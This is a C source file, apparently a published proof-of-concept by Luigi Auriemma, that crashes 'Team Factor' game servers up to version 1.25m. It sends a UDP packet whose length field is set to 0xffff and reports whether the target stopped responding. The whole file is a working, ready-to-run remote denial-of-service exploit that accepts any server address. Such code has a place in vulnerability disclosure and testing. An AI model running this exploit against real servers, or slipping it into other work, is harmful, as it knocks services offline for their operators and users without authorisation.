/*

by Luigi Auriemma

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    57778
#define TIMEOUT 5
#define OFFSET  12
#define BOOM    0xffff  // abnormal program termination
// #define BOOM    0x8000  // unallocated memory reading

#define SEND    { \
    err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz); \
    if(err < 0) std_err(); \
                }
#define RECV    { \
    err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz); \
    if(err < 0) std_err(); \
    buff[err] = 0; \
    printf("  %s\n", buff + OFFSET + 2); \
                }



int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                err,
                psz;
    u_short     port = PORT;
    struct  sockaddr_in peer;
    u_char      *buff,
                pck[] =
                "\x00\x00\x00\x00\x00\x00\x00\x00\xb1\x36\x01\x01"
                "\x00\x05" "hello";
//               |
//               big endian!

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Team Factor <= 1.25m remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\nTarget %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

        /* INFO */
    fputs("\n- Requesting informations:\n\n", stdout);
    SEND;
    if(timeout(sd) < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    RECV;

        /* BOOM */
    fputs("\n- Sending the BOOM packet:\n\n", stdout);
    *(u_short *)(pck + OFFSET) = htons(BOOM);
    SEND;
    if(timeout(sd) < 0) {
        fputs("Server IS vulnerable!!!!!!!!\n\n", stdout);
    } else {
        fputs("Server is not vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


